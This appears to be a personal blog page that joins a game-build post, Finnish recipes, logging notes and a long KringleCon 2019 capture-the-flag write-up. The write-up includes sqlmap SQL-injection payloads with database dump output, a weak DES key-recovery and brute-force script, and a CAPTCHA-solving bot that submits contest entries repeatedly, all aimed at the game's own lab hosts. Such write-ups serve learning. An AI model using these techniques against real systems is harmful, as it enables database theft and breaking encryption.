Quadra – Did You Play It?

In my youth I enjoyed the LANs. One fun game we played was Quadra – which is a multiplayer tetris where by playing the game you send more blocks to your opponents making it very stressful :D

https://github.com/quadra-game/quadra turns out it is open source and it’s out there!

Does it still build?

CentOS 7.7:

$ sudo yum install git
$ git clone github.com/quadra-game/quadra
$ sudo yum groupinstall "Development Tools" 
$ sudo yum install SDL2-devel boost-devel libpng-devel
$ cd quadra
$ autoreconf -i
$ ./configure
$ make

It DOES!

Does it run!?

$ QUADRADIR=. ./quadra

And I get a very nice window :)

Quadra in 2020! (do note that it tries to talk to google and sourceforge for updates and so on, try the ./configure –disable-version-check)

I could even launch one process to run a server and then another server and connect to localhost :) So multiplayer must sureley durely work!

It’s a big laggy – I recall it being very snappy because I was da bomb at this game :)

I blame this on that I might have missed some dependency and it now fell back into some easier something and or maybe the graphics card in this laptop is not good (maybe it’s too new? It’s a Skylake GT2 HD G 520).

Kringlecon 2019 Write-Up

The challenges!

Hoe the season to be jolly! Been giving a few CTFs  lately. It started with the disobey 2020 puzzle to get the hacker ticket. Then there was the OverTheWire‘s 2019 advent CTF. And finally this one, the SANS holiday hackmechallenge – KringleCon 2019. As of writing I got what felt like quite far in the disobey but got real nice stuck in the second keyhole. For OTF I found a similar but slightly easier challenge on the 6th day December, but did not manage to get the key. Most others except the first and challenge-zero I didn’t really have time for. So with not so much progress it was very nice to take a step back and try out KringleCon where I managed to get a bit further!

TLDR
Short tldr of methods to answers to the objectives
  1. talkt to santa: go upupuppu and click click click :)
  2. find turtle doves: mm they were in the union
  3. unredact: at the time I was on ski holiday so used termux on my phone and installed pdf2txt there to unredact it :) Fun to use the phone :)
  4. windows event log outcome: clicked around until I found something that looked suspicious. I think it was a filename that looked sensitive.
  5. windows event log technique: parsed these with python to print command_line and procerss_name the cat
  6. network log – compromised system: got it to print IPs with python
  7. splunk: followed the chat, was quite a nice way to learn the tool. Finding the correct file in the archive was a bit tricky, had to read through the chats carefully several times :)
  8. steam tunnels: the physical key! Spent quite some time wandering around trying to find the key. Eventually gave up. Then tried again after making it into the sleigh shop and hey there it was :) Couldn’t really get the decoder to line up so used pixels mostly, took 5 times or so :)
  9. captcha: super fun, most fun. Hadn’t tensorflowed before. Followed the youtube and github repo basically. Used an 80core 365GB cloud instance from $dayjob for a short while as the 2core 2GB RAM instance I used was too small ;)
  10. scraps: hadn’t used sqlmap before either. First mapped out the page manually to find the forms. Then learnt about sqlmap –crawl :) Money shot for me was –eval=”import requests;token=requests.get(‘https://studentportal.elfu.org/validator.php’).text”
  11. elfscrow: So. Hard. Learnt a bit more assembly reading. Used IDA this time instead of my previous attempts with radare2. Wonder when I’ll get better at these :)
  12. sleigh shop door. also very fun to unlock those locks! Did not solve it under 5s but the one slower than that.
  13. filter out poisoned: ugh this one was tedious. Actually this and previous I did spend some time trying to learn them, but in the end found a write-up that was published too early (and later removed but still in google cache..)

Getting on with it!

  • The pdf deobfuscate I could do on my phone in termux just a pkg install pdftotext :)
  • The nyancat took a bit of more time than I should admit, but primarily I forgot how sudo works and what sudo -u does..
  • The frosty keypad I got to write a small python script: (also on a wall somewhere :)
#!/usr/bin/python3
import random

#numbers = [ 1, 3, 7 ]

results = []

length = 4
digits = 1337

# from https://linuxconfig.org/function-to-check-for-a-prime-number-with-python
def is_prime_number(x):
  if x >= 2:
    for y in range(2,x):
      if not ( x % y ):
        return(False)
  else:
    return(False)
  return(True)

# from https://trinket.io/python3/00754ec904
while len(results) < 1000:
     for digit in range(1):
       digits =''.join(str(random.randint(0, 9)) for i in range(length))
       if "3" in digits and "1" in digits and "7" in digits and not "0" in digits and not "2" in digits and not "4" in digits and not "5" in digits and not "6" in digits and not "8" in digits and not "9" in digits:
         if digits not in results:
           if is_prime_number(int(digits)):
             results.append(digits)
             print(digits)

You’ll need to hit CTRL+C when it doesn’t find any more solutions. It’s not the fastest, has unused bits and I don’t know why it has the for digit in range(1) bit.

On to the next challenge!:

  • The windows events log file I just opened the file on a Windows machine and looked around
  • The sysmon file I printed some interesting keys in the json strings with a tiny python script
#!/usr/bin/python3
import json

with open('sysmon-data.json') as json_file:
    data = json.load(json_file)
    for p in data:
        try:
            print(p['command_line'])
        except:
            print(p['process_name'])
  • For the splunk basically just followed the chats. A bit tricky to be fair! By luck I had managed to already download the correct file from the Archive but did not look at it deep enough..
  • For the greylog just clicked around. I liked the “quick table” feature and that got me some of the questions fairly quickly without having to write more narrow searches. Quite a few steps needed for this so took some time. It was nice to get to compare greylog and splunk, I’ve only used a vanilla ELK stack before and last version 5. With that in mind the discover data was for me a bit easier on greylog.
  • Trail of tears I just beat the game on easy :) (/edit turns one can solve this on hard

Next one was a powershell one! The laser adjuster :P

Finally got to get a bit familiar with powershell. I’m a lurker on r/sysadmin and very often there are powershell oneliners on display there. This was quite a fun one to be honest :) Kind of like using python directly in the shell.

Some things I learnt were:

  • Get-History shows stuff! But no .bash_history so I actually wonder where this history is from? It’s not in .local/powershell…
  • Trying to bruteforce this one manually was very slow so I gave that up fairly quickly.
  • I tried to find a way into reading the python code that powered the website. Only found the process id but no open files visible. Would need to get root for that I suppose..
  • figured out how to -X POST a body for the gases!
  • hints in chat suggested powering off and on
  • $env has things!
  • Format-Hex -Path ./archive | Select-Object -First 1
    • magic number 50 4B 03 == zip
    • expand-archive
    • chmod +x
    • get-content riddle # Gives an md5sum
  • md5sum hunter
$files = Get-childitem -Path /home/elf/depths -recurse -File
Foreach ($file in $files)
 {
     if((Get-FileHash -Path $file.fullname -Algorithm MD5).hash | Select-String 25520151A320B5B0D21561F92C8F6224){
       $file
     }
 }

Could have found this with a recurse grep for temperature -e angle -e param..

The solution:

(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent                                       $correct_gases_postbody = @{O='6';H='7';He='3';N='4';Ne='22';Ar='11';Xe='10';F='20';Kr='8';Rn='9'}      (Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $correct_gases_postbody).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent

iptables

  • Iptables/ smart bracelet one: think I was close or did complete this but Kent did not agree? Went back and tried this again slowly by first writing the commands in a text file
#1
sudo iptables -P FORWARD DROP

sudo iptables -P INPUT DROP

sudo iptables -P OUTPUT DROP

#2
# shouldbe in two lines? as the iptables output orders them related,established..
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

#3
sudo iptables -A INPUT -p tcp --dport 22 -s 172.19.0.225 -j ACCEPT

#4
sudo iptables -A INPUT -p tcp --dport 21 -s 0.0.0.0/0 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -s 0.0.0.0/0 -j ACCEPT

#5
sudo iptables -A OUTPUT -p tcp --dport 80 -d 0.0.0.0/0 -j ACCEPT

#6
sudo iptables -A INPUT -i lo -j ACCEPT

Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
  • Sled Route API : Got the login. Next to figure out which requests were bad and how to fill in 100 on the web page… Maybe one can figure out the firewall API? Hmm played a bit with elasticsearch.. then gave up.. in the meantime went ahead to:

Sleigh Shop Door

  • Ah this isfun! While poking through the web source after fixing the smartbracelet found the URL to the sleigh shop in teh source. It had a bunch of locks.
haha! if you reload the page the codes needed are different!

1. B46DU583 - top of the console
2. XNUBLBKW - see it by lookingin ctrl p
3. unknown, fetched but never shown..

ha this was funneh, so clicking around the tabs found a javascript that needed some deobfuscate/jsnice.org and it found var _0x1e21

so I ran that in the console with the values found in if statements and eventually:

console.log(_0x1e21["jIdunh"]);

 and it printed a bunch of things, and element 34 had an image:

console.log(_0x1e21["jIdunh"][34]);
VM3008:1 images/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12.png

which was image with combination to the 3rd lock

4. ILMJRNTP found in local storage
5 CJ4WCMG4 - <title></title>

6. from the card.. Y3WJVE01 sticker - but if one removes the hologram CSS the letters are in a different order JYV0EW13. 
7. G7LDS1LS - font family

8 VERONICA In the event that the .eggs go bad, you must figure out who will be sad.
From client.js and then deobfuscated to make it a bit readable and just read through

9 8SEOGRW1
chakra in css file

https://sleighworkshopdoor.elfu.org/css/styles.css/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12
10. compopnent.swab, bunch of things around lock c10

finding .locks > li > .lock.c10 .cover

one can remove the cover

on the board there's a code: KD29XJ37

but all the other codes have been per session..

console.log says "Missing macaroni"

In the code there's:

 console["log"]("Well done! Here's the password:");
 console[_0x1e21("0x45")]("%c" + args["reward"], _0x1e21("0x46"));

In the console there's this whenever one presses the unlock:

73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Error: Missing macaroni!
    at HTMLButtonElement.<anonymous> (73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1)
(anonymous) @ 73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1

there's a bunch of "<div class="component gnome, mac, swab" with data-codes: XJ0 A33 J39

Dragging the components further down changed the error and printed this in the console:

Well done! Here's the password:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 The Tooth Fairy
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 You opened the chest in 6291.088 seconds
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Well done! Do you have what it takes to Crack the Crate in under three minutes?
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Feel free to use this handy image to share your score!
  • Doing the combination locks in under 3 minutes I think can be done manually.
    • But nice thing to do would be to enter a bunch of commands into the browser console to help with some programmatically. Maybe one can enter javascript to also enter the numbers into the locks??
console.log(document.title)
some are maybe fixed??:
VERONICA
KD29XJ37

However, after doing that as fast as I could manually:

You opened the chest in 150.151 seconds
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Very impressive!! But can you Crack the Crate in less than five seconds?
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Feel free to use this handy image to share your score!
  • For that I’m thinking burp suite to automate the browser is needed?
  • When inside the Sled Shop there was a request to get the IP for the connection with longest duration:
head conn.log|jq '.["id.orig_h"],.duration' -c 'sort_by(.duration)'
cat conn.log|jq -s -c 'sort_by(.duration)' > /tmp/sorted
cat /tmp/sorted#... took forever, then just looked at the bottom:
                                                                                                                       {"ts":"2019-0
4-18T21:27:45.402479Z","uid":"CmYAZn10sInxVD5WWd","id.orig_h":"192.168.52.132","id.orig_p":8,"id.r                     esp_h":"13.107.21.200","id.resp_p":0,"proto":"icmp","duration":1019365.337758,"orig_bytes":3078192                     0,"resp_bytes":30382240,"conn_state":"OTH","missed_bytes":0,"orig_pkts":961935,"orig_ip_bytes":577                     16100,"resp_pkts":949445,"resp_ip_bytes":56966700}]   

Finishing each challenge gives some tips to some other challenges. There was a hint to the Sled Route API suggesting to use jq. And there was another that if you beat the Trail Game on Hard there’s more hints? Also beating the lock game in under 3 minutes is another hint I think..

  • Next one I managed was the key bitting one to get into the Steam Tunnels! There was a good talk on this topic with a link to https://github.com/deviantollam/decoding and then just used that and tried maybe 5 keys before finding the right now. GIMP is not my specialty but the decoders helped a bit. The image of the key was not discoverable until one got into the Sleigh Shop.

Image AI

And then we get to the CAPTCHA + tensorflow madness! This was real fun, haven’t had to do much with tensorflow before. Did not have to read much at all about tensorflow to get this going, could basically just glue together the provided python scripts.

Another very good kringlecon talk on this topic: https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be led to a github repo. Some other code and training images were found as soon as one got far enough into the Steam Tunnels. I managed to after not too much googling get the python script to store the images in teh CAPTEHA in a directory and then run the predict tensorflow python script on the github repo against it. It was however too slow. Fortunately I had access to a machine with lots of cores so moving all the data there and re-running the python got it working for me. 2 oversubscribed cores and 2GB RAM was too little. 80 dedicated single server skylake cores and 356GB RAM completed it much faster. There were messages about tensorflow from pip not having been compiled with all the things enabled. I could I suppose also have tried this with a GPU :) And the PYTHON:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import shutil
import base64

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

# above is from predict_images_using_trained_model.py because python and import meh

###########

def main():
    yourREALemailAddress = "MYREALEmAEL@example.org"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    #print(b64_images)
    # 0 wipe unknown_images dir
    # why wipe it tho?
    try:
        shutil.rmtree('unknown_images')
    except:
        os.mkdir('unknown_images')
    try:
        os.mkdir('unknown_images')
    except:
        True
    # 1 write b64 to unknown_images dir

    imgcnt = 0
    for image in b64_images:
        imgcnt = imgcnt + 1
        content = image['base64']
        uuid = image['uuid']

        try:
           content=base64.b64decode(content)
           filename = "unknown_images/%s" % uuid
           with open(filename,"wb") as f:
                f.write(content)
                #f.write(content.decode("utf-8"))
        except Exception as e:
           print(str(e))
    #    if imgcnt > 10:
     #       break
    # 2 run the predict against it
    #  python3 predict_images_using_trained_model.py would have been fun instead we copy pasta
    # https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py talks about mobilenet and speed optimizations..

    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)

    #Going to interate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)

        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.

    # 3 get a list of the uuids for each type
    good_images = []
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))        if prediction['prediction'] in challenge_image_types:
            good_images.append(prediction['img_full_path'].split('/')[1])
    # TensorFlow Predicted unknown_images/dc646068-e584-11e9-97c1-309c23aaf0ac is a Santa Hats with 99.86% Accuracy

    # 4 make a new b64_images csv list with the uuids
    print(challenge_image_types)
    print(good_images)
    good_images_csv = ','.join(good_images)

    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    #final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    final_answer = good_images_csv

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

NEEEXT! Student Body finding some scrap papers objective 9

  • Got some hints in the game talking about sqlmap. Let’s play with that and learn about SQL injections :)
    • Started by looking at the page and reading the source code. Identified two forms on two pages that looked interesting.
    • First went down a rabbit hole of the sqlmap tamper scripts.
    • Just doing this:
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://url?token=$token" -p variable
  • Got sqlmap to find that elfmail in the check.php was vulnerable.
  • a curl “https://url?elfmail=me@me.com’token=$token”
    • got a noice SQL error!
  • tamper investigation was not wasted because
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://studentportal.elfu.org/application-check.php?elfmail=my%40example.com&token=$token" -p elfmail --eval="import requests;token=requests.get('https://studentportal.elfu.org/validator.php').text"
  • was needed to get sqlmap to find some techniques. Presumably the token only worked for the first tests.
#SNIPSNIP
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: elfmail=my@example.com' AND 2977=2977 AND 'tYvj'='tYvj&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: elfmail=me@example.com' AND (SELECT 4602 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(4602=4602,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XazW'='XazW&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

Could not get the above queries to work in a curl.. maybe some escape messup. But sqlmap –users find stuff.

[18:51:19] [INFO] retrieved: 'elfu'
[18:51:20] [INFO] retrieved: 'applications'
[18:51:21] [INFO] retrieved: 'elfu'
[18:51:22] [INFO] retrieved: 'krampus'
[18:51:23] [INFO] retrieved: 'elfu'

sqlmap had a nice –sql-shell and with that one could “select * from elfu.krampus” which got us some paths:

select * from elfu.krampus [6]:
[*] /krampus/0f5f510e.png, 1
[*] /krampus/1cc7e121.png, 2
[*] /krampus/439f15e6.png, 3
[*] /krampus/667d6896.png, 4
[*] /krampus/adb798ca.png, 5
[*] /krampus/ba417715.png, 6

Now then that looks like an OS path, need to run a shell command.. but on a whim tried https://studentportal.elfu.org/krampus/ and yay found them there. Fired up good old GIMP and learnt about the rotate tool :P Yay, one more objective!

Remaining are reversing some crypto windows executable and the ban the IPs in the firewall for the route API

Crypto then. Hint is https://www.youtube.com/watch?v=obJdpKDpFBA&feature=youtu.be > https://github.com/CounterHack/reversing-crypto-talk-public

Running an encryption tells us it uses unix epoch as a seed and a hint to the challenge was ” We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. ” This is from 1575658800 to 1575666000 . There are some super_secure_random and super_secure_srand functions found with IDA freeware. Probably they are not super. https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptimportkey for example is one in use. I wonder what the difference with –insecure is? One error talks about DES-CBC which internet says is insecure. It uses 56-bits and 8bytes. Stack of do_encrypt also says “dd 8” so yay?

00000000 ; [00000008 BYTES. COLLAPSED UNION  _LARGE_INTEGER. PRESS CTRL-NUMPAD+ TO EXPAND]
00000000 ; [00000008 BYTES. COLLAPSED STRUCT $FAF74743FBE1C8632047CFB668F7028A. PRESS CTRL-NUMPAD+ TO EXPAND]

Which is used in security_init_cookie And imp__QueryPerformanceCounter. Way more than 8 bytes though.

While looking at these listened to the youtube talk and it said “running it at the same time generates the same key” – tried that with two identical files and it generated the same key. What about with two files without same checksum? Yep. Same. Encryption key. So next step would be to try to encrypt something for every second between 1575658800 to 1575666000 ? That’s 7200. Which would give us 7200 keys we could try to use to decrypt the file. Is it too much? Right now I’m thinking the –insecure might help if one use the Burp suite to intercept the packages to the elfscrow api server? The time bit in the code uses time64

call time into eax
then eax as a parameter into:
call super_secure_srand
there is a loop (8) and inside that it calls super_secure_random which looks complicated but by googling the numbers in decimal we find: https://rosettacode.org/wiki/Linear_congruential_generator#C

which has

rseed * 214013 + 2531011
# the disasembled then does:
sar     eax, 10h
and     eax, 7FFFh

Which is also here: http://cer.freeshell.org/renma/LibraryRandomNumber/
And here I learnt that >> in python is the sar.

After goin walking thought a bit about what is the end goal here. And it is not the key, but it could be. Right now plan is to generate the secret-id, because the secret-id is what is used to decrypt with the tool, not the key. But maybe the uuid is something you only get from the escrow API server.

$ curl -XPOST http://elfscrow.elfu.org/api/store -d 1234567890abcdef
0e5b05dd-e132-42aa-b699-1829d3e23e2f
$ curl -XPOST http://elfscrow.elfu.org/api/retrieve -d 0e5b05dd-e132-42aa-b699-1829d3e23e2f
1234567890abcdef

Seems it is. And the hex needs to be in lower letters. ABCDEF did not fly. UUID must be in this format: 00000000-0000-0000-0000-000000000000 it seems. Not sure about sqlmap use here. . SSH and web server is running. But SSH has been open on several previous addresses in this CTF too..

 WEBrick/1.4.2 (Ruby/2.6.3/2019-04-16) at
 elfscrow.elfu.org:443

Actually what might be doable with just the key is to: setup my own API server that just returns the key.. Change the address in the binary or finally use BURP or local DNS override? Still need to figure out the key :))

Let’s try to read the do_encrypt again

  1. call read_file
  2. set some crypto vars
  3. call CryptAcquireContext
  4. call generate_key
    1. key goes into eax register I think
  5. call print_hex
  6. more crypto
  7. call CryptImport and CryptEncrypt
  8. call store_key and write_file
  9. call security_check_cookie

Generate_key does:

  1. call time
  2. call super_secure_srand, probably with file,time and seed as args
  3. loop 8 times and call super_secure_random to modify state?
call    ?super_secure_random@@YAHXZ ; super_secure_random(void)
movzx   ecx, al
and     ecx, 0FFh
mov     edx, [ebp+buffer]
add     edx, [ebp+i]
mov     [edx], cl

super_secure_srand does:
something with seed.. really unsure

super_secure_srandom does:
this is doing the rseed, sar, and

The Key Writer

#!/usr/bin/python3


# key examples

# dcd5ed4c2acba87e
# 9f32148fe8ef55a8
# 0d2bac4df0a12e5a
# fa41fb5131993bf5

#https://www.aldeid.com/wiki/X86-assembly/Instructions/shr
# like the >> much more than ^

# https://rosettacode.org/wiki/Linear_congruential_generator#Python
def msvcrt_rand(seed):
    def rand():
      nonlocal seed
      fixed = seed
      keyarray = bytearray()
      for i in range(8):
        #ka = (214013*seed + 2531011)
        fixed = fixed * 0x343fd + 0x269ec3
        key = hex(fixed >> 0x10 & 0x7ffffff)[-2:] # >> sar 16 & is and. We only want the last two bytes - the start look very similar..
        if 'x' in key:
            key = key.replace('x', '0') # because movzx
        key = bytes.fromhex(key)
        keyarray.append(key[0])
      return(keyarray) # last two
    return(rand())

seed = range(1575658800,1575666001)
# so not off by 1                ^
for rseed in seed:
  two = msvcrt_rand(rseed)
  print(two.hex())

Trying the edit hosts file. As I use WSL I learnt that for .exe files I also need to update window’s hosts file, even though I run it from inside the WSL! Also the syntax is NOT:

localhost elfscrow.elfu.org

Bunch of false positives for some reason… when I use the list of keys I generated and my API and a localhost flask API and hosts file override. Anyway, let this run and used file to stop when it found a pdf, it stopped at 4849 (or 4850th key in keys [] in my python api.py, unsure if that is sorted.. so the creation time might have been 1575663650 ( Friday, December 6, 2019 8:20:50 PM ) :

#!/bin/bash

# the Bruter

for i in $(seq 0 7200); do
  ./elfscrow.exe --decrypt --id=7debfae7-3a16-41e7-b211-678f5ebdce00 ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc out.pdf --insecure
  if [ -f out.pdf ]; then
          isitpdf=$(file out.pdf|grep -c PDF)
          if [ $isitpdf != 0 ]; then
            echo $isitpdf
            echo "GOT IT $i"
            exit 123
          else
            mv -v out.pdf "falses/$i.pdf"
          fi
  fi
done

and the API.py

#https://stoplight.io/blog/python-rest-api/
from flask import Flask, json
import os

keys = ["b5ad6a321240fbec", "7200...", "7199", "..."]
api = Flask(__name__)

@api.route('/api/retrieve', methods=['POST'])
def get_companies():
  # store last key tested in a file

  statefile = "/root/elfscrow_status"
  with open(statefile,"r") as r:
    content = r.read()
    try:
      int(content)
    except ValueError:
      with open(statefile,"w+") as f:
        f.write("0")
      return("0")

    icontent = int(content)
    ncontent = int(content) + 1
    print("Last was %s, updating to %s" % (icontent, ncontent))

    with open(statefile,"w+") as f:
      f.write(str(ncontent))

  return str(keys[ncontent])
  #return json.dumps(companies)

if __name__ == '__main__':
    api.run(port=80)

Then to get the key was just a pdf2txt and the 5 word sentence in the beginning of the document!

OK THE ZEEK/BRO Logs is the last one?

The username was found in https://srf.elfu.org/README.md

Started on this earlier but stopped because I wasn’t feeling it and it was a bit tedious.
Plan: Make the queries programmatically. Also this time check sizes of requests maybe that’s important. Also time when attacks happen could be useful?

let’s try out RITA as indicated in a hint, also found Malcolm while looking up this tool.. could be fun. But at least RITA couldn’t import the http.log :/

weird that the IPs in with the LFI, shellshock etc haven’t posted.. maybe they posted later?

Wow you made it all this way? Prepare for a bit of downer! :)

In the end I ran out of time. End of new year approached and some busy times in January 2020! Turned out I got quite far with a python script, but had too many good IPs in my list I think. In the end I used a JQ solution found in a writeup that is available in the google cache, initially found by searching for the numbers used for the srand function in the elfscrow challenge.

https://downloads.elfu.org/LetterOfWintryMagic.pdf

Resepti: Tortellini Casserole

  • 2x tortellini 250g
  • 1x kirsikka tomaatia
  • 1x tomaatia murska yrtejä
  • 1x ruokakerma 10%
  • 1x feta juusto
  • suola ja pippuri

Miksata kerma, tomaatimurska ja mausteet. Kaada sose formille jossa on jo tortellinia ja tomaatia. fetajuusto päällä. Uunille 200 ℃ ~18min.

Versiolle kaksille: ehkä parempi rikottajuusto, penaati ja ilman tomaatimurska?

Resepti: Lapsi Kana & Lohi Porkkana Bataatti

Ota pakasti lohta pakastimesta.

  • 3 bataatia
  • 1 palsternakkaa
  • 3 porkkanaa
  • 1 sopuli
  • 2 valkosipulinkyntä

Laita kaikki kahteen kattilaan. Joka painee noin 800g. Vesimäärä tarvitset on ‘niin paljon että se menee yli ruoan’. Keitä ruoka.

Kun se in valmis laita 400g lohta yhteen kattilaan ja 400g kanaa toiseen.

Resepti: Puuro

Kahdelle

3dl vettä ja 3dl maitoa. Vispata ja kun höyry tulee ottaa lämmöt allas. Laitta 4x 3/4dl (12/4 vai 3dl) hiutaleita (esim kaurasta tai neljänviljasta) skuupat. Kun on melkein valmis lämmöt pois ja lautta suola.

Laittaa puuron kulhoihin, laitta voita keskellä ja silloin sokeria.

Tadaa :)

Logging as a Service

Is there an open source thing out there I could use??

So if I only want to use mostly free and open source it there’s a bunch of tools one need to glue together:

These days I’d like to for primary ingestion have a BGP ECMP/anycast for rsyslog receivers. These also run logstash (or beat?). Or maybe one can have a load balancer up front which redirects traffic based on incoming port (and maybe a syslog tag for some ‘authentication’ ? ) to a set of logparsing/rsyslog servers.

These would write to a Kafka cluster.

Then we would need more readers to stream events on to elastic, siems or Hadoop or for example longer term storage engines.

For the as a Service bit I’d like to play with Rundeck and have users configure most of the bits themselves. Logstash grokking/parsing though needs outsourcing too. Fewer rules means more throughput so would be good with different logstash processes for different logs. Could like loggly direct users to ship logs with a tag to get them into the correct lane.

For reading just grafana and kibana should be a good start.

Resepti: Kana Caesar

Croutons : Uniin päällä. Laitta pakastettuna leipä mikroaaltouuniin ja lämmitävät. Leikkaa ja laitaa uunilevylle. Miksata öljyllä ja valkosipulilla. Odottaa.

Majoneesi : 1dl rypsiöljy. Yhden kanamuna (ei rikkitää) ja vähän sinappi. Käytää sauvamixeri(sauvasekoitin on oikea sana) . Laitta pieni kulhoon ja lisätä valkosipulii ja suola.

